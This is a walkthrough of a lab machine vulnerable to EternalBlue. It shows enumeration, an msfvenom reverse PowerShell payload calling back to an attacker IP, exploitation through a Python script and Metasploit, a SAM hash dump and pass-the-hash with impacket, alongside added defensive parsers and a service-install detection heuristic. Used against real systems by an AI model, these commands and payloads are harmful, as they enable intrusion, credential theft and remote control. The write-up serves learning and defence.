Enumeration
We start by scanning the machine's ports with nmap, although there are really not many open ports beyond SMB and RPC.
❯ nmap 10.10.10.40
Nmap scan report for 10.10.10.40
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
With crackmapexec at the SMB level we can see that it detects a Windows 7 Service Pack 1 x64, and that it is running SMBv1 without signing.
❯ crackmapexec smb 10.10.10.40
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
We have a Windows 7 with SMBv1 and the machine is called Blue, so we can test with an nmap script whether it is vulnerable to EternalBlue.
❯ nmap -p 445 --script smb-vuln-ms17-010 10.10.10.40
Nmap scan report for 10.10.10.40
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
EternalBlue - Python
If we wanted to exploit it without using Metasploit, relying on a Python script, we can use the GitHub repo; when we run the checker it tells us it has no access.
❯ python2 checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
By default the script uses nothing as username and password; listing the SMB shares with crackmapexec this way returns STATUS_ACCESS_DENIED.
❯ crackmapexec smb 10.10.10.40 -u '' -p '' --shares
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\:
SMB 10.10.10.40 445 HARIS-PC [-] Error enumerating shares: STATUS_ACCESS_DENIED
However, using null as the username and providing no password returns no error and shows us the shares present on the machine.
❯ crackmapexec smb 10.10.10.40 -u null -p '' --shares
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\null:
SMB 10.10.10.40 445 HARIS-PC [+] Enumerated shares
SMB 10.10.10.40 445 HARIS-PC Share Permissions Remark
SMB 10.10.10.40 445 HARIS-PC ----- ----------- ------
SMB 10.10.10.40 445 HARIS-PC ADMIN$ Remote Admin
SMB 10.10.10.40 445 HARIS-PC C$ Default share
SMB 10.10.10.40 445 HARIS-PC IPC$ Remote IPC
SMB 10.10.10.40 445 HARIS-PC Share READ
SMB 10.10.10.40 445 HARIS-PC Users READ
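The two crackmapexec runs above carry the findings a defender would act on: SMBv1 enabled, signing not required, and two non-default shares readable through a null session. The following parser is an added example (not part of the write-up or of crackmapexec itself) that extracts those flags and the share table from crackmapexec's output and turns them into findings; SAMPLE_OUTPUT is constructed to mirror the output above.

```python
"""Triage of crackmapexec SMB output (added example, not part of the original
write-up or of crackmapexec itself).

Parses the host banner line ("[*] Windows 7 ... (signing:False) (SMBv1:True)")
and the share table, then reports what a defender would act on: SMBv1 still
enabled, SMB signing not required, and shares readable through a null session.
SAMPLE_OUTPUT is constructed to mirror the write-up's output, not captured live.
"""
import re

SAMPLE_OUTPUT = """\
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\\null:
SMB 10.10.10.40 445 HARIS-PC [+] Enumerated shares
SMB 10.10.10.40 445 HARIS-PC Share Permissions Remark
SMB 10.10.10.40 445 HARIS-PC ----- ----------- ------
SMB 10.10.10.40 445 HARIS-PC ADMIN$ Remote Admin
SMB 10.10.10.40 445 HARIS-PC C$ Default share
SMB 10.10.10.40 445 HARIS-PC IPC$ Remote IPC
SMB 10.10.10.40 445 HARIS-PC Share READ
SMB 10.10.10.40 445 HARIS-PC Users READ
"""

# Banner line: OS string followed by the (name:)(domain:)(signing:)(SMBv1:) flags.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+(?P<os>.*?)"
    r"\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)"
    r"\s+\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)$"
)
# Every other line: strip the "SMB <ip> <port> <host>" prefix and keep the rest.
PREFIX_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<rest>.*)$")
# Share table row: name, optional permission token, optional remark.
SHARE_RE = re.compile(
    r"^(?P<share>\S+)(?:\s+(?P<perm>READ,WRITE|READ|WRITE))?(?:\s+(?P<remark>.*))?$"
)
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}


def parse_cme_smb(text):
    """Return (host_info, shares) where shares is a list of (name, perms)."""
    host, shares, in_table = {}, [], False
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if m:
            host = m.groupdict()
            host["signing"] = host["signing"] == "True"
            host["smbv1"] = host["smbv1"] == "True"
            continue
        p = PREFIX_RE.match(line)
        if not p:
            continue
        rest = p.group("rest")
        if rest.startswith("-----"):      # separator under "Share Permissions Remark"
            in_table = True
            continue
        if not in_table or rest.startswith("["):
            continue
        s = SHARE_RE.match(rest)
        if s:
            shares.append((s.group("share"), s.group("perm") or ""))
    return host, shares


def findings(host, shares):
    """Defender-facing findings derived from the parsed output."""
    out = []
    if host.get("smbv1"):
        out.append("SMBv1 enabled: MS17-010 attack surface, disable SMBv1")
    if host and not host["signing"]:
        out.append("SMB signing not required: relay exposure, require signing")
    for name, perm in shares:
        if name not in ADMIN_SHARES and perm:
            out.append(f"share {name} readable via null session ({perm}): restrict anonymous access")
    return out


if __name__ == "__main__":
    h, s = parse_cme_smb(SAMPLE_OUTPUT)
    for f in findings(h, s):
        print("[!]", f)
```

Run against the sample it reports four findings: SMBv1 on, signing off, and the Share and Users shares readable anonymously. The administrative shares are listed but carry no permission token for the null user, so they are not flagged.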
It is enough to modify the script, changing USERNAME to null, and run it again.
When run this time it works, and after testing several pipes it returns Ok (64 bit) on 2 of them, samr and lsarpc, which are the ones we can use.
❯ python2 checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
browser: STATUS_OBJECT_NAME_NOT_FOUND
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
samr: Ok (64 bit)
lsarpc: Ok (64 bit)
It is vulnerable, so to exploit it we start by creating a malicious exe with msfvenom that will send us a PowerShell when it is executed.
❯ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1877 bytes
Final size of exe file: 8192 bytes
Saved as: shell.exe
We modify the script, changing the user to null, and run it passing the following as arguments: the machine's IP, the malicious exe, the port, and the pipe.
❯ python2 send_and_execute.py 10.10.10.40 shell.exe 445 samr
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001ebfba0
SESSION: 0xfffff8a001b2f6e0
FLINK: 0xfffff8a0005b4088
InParam: 0xfffff8a00053e15c
MID: 0x4007
unexpected alignment, diff: 0x75088
leak failed... try again
CONNECTION: 0xfffffa8001ebfba0
SESSION: 0xfffff8a001b2f6e0
FLINK: 0xfffff8a0005c0088
InParam: 0xfffff8a0005ba15c
MID: 0x4103
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 14Z5CV.exe...
Opening SVCManager on 10.10.10.40.....
Creating service ljTi.....
Starting service ljTi.....
The NETBIOS connection with the remote host timed out.
Removing service ljTi.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
After running the exploit, the exe executes and sends us a PowerShell as the user nt authority\system, with maximum privileges on the host.
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.40
Windows PowerShell running as user HARIS-PC$ on HARIS-PC
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
EternalBlue - Metasploit
It is vulnerable; in this case we exploit it with Metasploit. We run msfconsole and define the exploit we want to use, in this case ms17-010 (EternalBlue).
❯ sudo msfconsole -q
[msf](Jobs:0 Agents:0) >> use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
We set rhosts to the victim machine's IP address and lhost to the tun0 interface.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts 10.10.10.40
rhosts => 10.10.10.40
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost tun0
lhost => tun0
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
Running it gets us a meterpreter session as nt authority\system directly, which is the user with maximum privileges on Windows hosts.
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run
[*] Started reverse TCP handler on 10.10.14.10:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.10.40
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.40:49158) at 2023-02-09 19:18:56 -0600
(Meterpreter 1)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 1)(C:\Windows\system32) >
With the shell command in meterpreter we get a cmd; in C:\Users we can see only 2 users, both flags are on the Desktop and we have privileges to read them.
(Meterpreter 1)(C:\Windows\system32) > shell
Process 2852 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,429,788,160 bytes free
C:\Users> type C:\Users\haris\Desktop\user.txt
059**************************681
C:\Users> type C:\Users\Administrator\Desktop\root.txt
399**************************deb
C:\Users>
We can use the meterpreter function to dump the SAM and view the hashes.
(Meterpreter 1)(C:\Windows\system32) > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdf51b162460b7d5bc898f493751a0cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
haris:1000:aad3b435b51404eeaad3b435b51404ee:8002bc89de91f6b52d518bde69202dc6:::
(Meterpreter 1)(C:\Windows\system32) >
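The hashdump lines follow the user:RID:LM_hash:NT_hash::: format. The following audit is an added example (not from the write-up or from Metasploit) of what a defender does with such a dump after an incident: it flags accounts with an empty password (the Guest line above), accounts that still store a real LM hash, and NT hashes shared between accounts. SAMPLE_DUMP is constructed for the example; its non-empty hash values are placeholders, not the hashes shown above.

```python
"""Audit of hashdump-style output (added example, not part of the original
write-up or of Metasploit).

Each line is user:RID:LM_hash:NT_hash::: . The audit flags accounts whose NT
hash is the hash of the empty password, accounts that still store a real LM
hash (LM storage should be disabled), and NT hashes shared between accounts
(the same password reused). SAMPLE_DUMP is constructed; the non-empty hash
values are placeholders, not real hashes.
"""
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is off
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:00112233445566778899aabbccddeeff:0123456789abcdef0123456789abcdef:::
"""


def parse_hashdump(text):
    """Parse user:rid:lm:nt::: lines into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        rows.append({"user": parts[0], "rid": int(parts[1]),
                     "lm": parts[2].lower(), "nt": parts[3].lower()})
    return rows


def audit(rows):
    """Return a list of human-readable issues found in the dump."""
    issues, by_nt = [], {}
    for r in rows:
        if r["nt"] == EMPTY_NT:
            # hashdump does not show whether the account is disabled; check Guest's status separately
            issues.append(f"{r['user']}: empty password")
        if r["lm"] != EMPTY_LM:
            issues.append(f"{r['user']}: LM hash stored (NoLMHash not enforced)")
        by_nt.setdefault(r["nt"], []).append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            issues.append("shared password between " + ", ".join(users))
    return issues


if __name__ == "__main__":
    for issue in audit(parse_hashdump(SAMPLE_DUMP)):
        print("[!]", issue)
```

The RID 500 hash is the one that matters most in a post-incident review: as the write-up shows next, it can be replayed over the network without the password, so the response is to rotate it on every host that shares it and to keep local administrator passwords unique per machine.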
We check Administrator's NT hash with crackmapexec and it returns Pwn3d!
❯ crackmapexec smb 10.10.10.40 -u Administrator -H cdf51b162460b7d5bc898f493751a0cc
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\Administrator:cdf51b162460b7d5bc898f493751a0cc (Pwn3d!)
Using impacket's psexec or wmiexec we can connect by doing pass-the-hash and get a cmd as the user nt authority\system.
❯ impacket-psexec WORKGROUP/Administrator@10.10.10.40 -hashes :cdf51b162460b7d5bc898f493751a0cc
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.40.....
[*] Found writable share ADMIN$
[*] Uploading file zqdeRFGe.exe
[*] Opening SVCManager on 10.10.10.40.....
[*] Creating service BawI on 10.10.10.40.....
[*] Starting service BawI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
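Both the ServiceExec step of send_and_execute.py earlier (service ljTi, file 14Z5CV.exe) and impacket-psexec here (service BawI, file zqdeRFGe.exe) leave the same trace on the target: a service with a short random name whose binary was just uploaded to the root of ADMIN$, started, and removed. The Service Control Manager records each install as System-log Event ID 7045. The following detection heuristic is an added example (not from the write-up or from impacket) run over constructed records in the shape of an EVTX-to-JSON export; it alerts only when all three indicators line up, so svchost-hosted or normally installed services are not flagged. The length bounds in RANDOM_BINARY are an assumption tuned to the two file names seen on this page.

```python
"""Detection heuristic for psexec-style service installs (added example, not
from the original write-up or from impacket).

Both the ServiceExec step of send_and_execute.py and impacket-psexec in the
write-up create a service with a 4-letter random name whose binary is a random
short .exe uploaded to ADMIN$ (the root of %SystemRoot%), start it and remove
it. On the target this leaves System-log Event ID 7045 ("A service was
installed in the system"). SAMPLE_EVENTS are constructed records in the shape
of an EVTX-to-JSON export, not real logs; the length bounds in RANDOM_BINARY
are tuned to the two names seen in the write-up (14Z5CV.exe, zqdeRFGe.exe).
"""
import re

RANDOM_SVC_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY = re.compile(r"^[A-Za-z0-9]{6,8}\.exe$", re.IGNORECASE)
# Directories that correspond to the root of ADMIN$ (lower-cased).
DROP_DIRS = {"%systemroot%", "c:\\windows", "\\\\127.0.0.1\\admin$"}

SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "HARIS-PC", "ServiceName": "BawI",
     "ImagePath": r"%SystemRoot%\zqdeRFGe.exe", "StartType": "demand start"},
    {"EventID": 7045, "Computer": "HARIS-PC", "ServiceName": "ljTi",
     "ImagePath": r"%SystemRoot%\14Z5CV.exe", "StartType": "demand start"},
    # Benign installs: the name does not look random, or the binary lives in a subfolder.
    {"EventID": 7045, "Computer": "HARIS-PC", "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe", "StartType": "auto start"},
    {"EventID": 7045, "Computer": "HARIS-PC", "ServiceName": "Dhcp",
     "ImagePath": r'"%SystemRoot%\system32\svchost.exe" -k LocalServiceNetworkRestricted',
     "StartType": "auto start"},
    {"EventID": 7036, "Computer": "HARIS-PC", "ServiceName": "BawI"},  # state change, ignored
]


def split_image_path(image_path):
    """Return (directory lower-cased, basename) of a 7045 ImagePath, dropping quotes and arguments."""
    path = image_path.strip().strip('"')
    cut = path.lower().find(".exe")
    if cut != -1:
        path = path[:cut + 4]
    directory, _, base = path.rpartition("\\")
    return directory.lower(), base


def classify(event):
    """Return an alert dict when all three psexec-style indicators line up, else None."""
    if event.get("EventID") != 7045:
        return None
    name = event.get("ServiceName", "")
    directory, base = split_image_path(event.get("ImagePath", ""))
    reasons = []
    if RANDOM_SVC_NAME.match(name):
        reasons.append(f"4-letter service name {name!r}")
    if RANDOM_BINARY.match(base):
        reasons.append(f"random-looking binary {base!r}")
    if directory in DROP_DIRS:
        reasons.append(f"binary dropped at the ADMIN$ root ({directory})")
    if len(reasons) < 3:   # any single indicator alone is too noisy (e.g. svchost-hosted services)
        return None
    return {"computer": event.get("Computer"), "service": name, "binary": base, "reasons": reasons}


def detect(events):
    """Run classify() over a sequence of events and keep the alerts."""
    return [a for a in map(classify, events) if a]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("[!]", alert["computer"], alert["service"], "->", "; ".join(alert["reasons"]))
```

Note that the 7045 record is written when the service is created, so it survives even when the attacker's tool reports an error afterwards: in the send_and_execute run above the NETBIOS connection timed out and the service was removed, yet the shell still arrived. Correlating the alert with the preceding Event 4624 (logon type 3, NTLM, from the same source address) ties the install to the pass-the-hash logon.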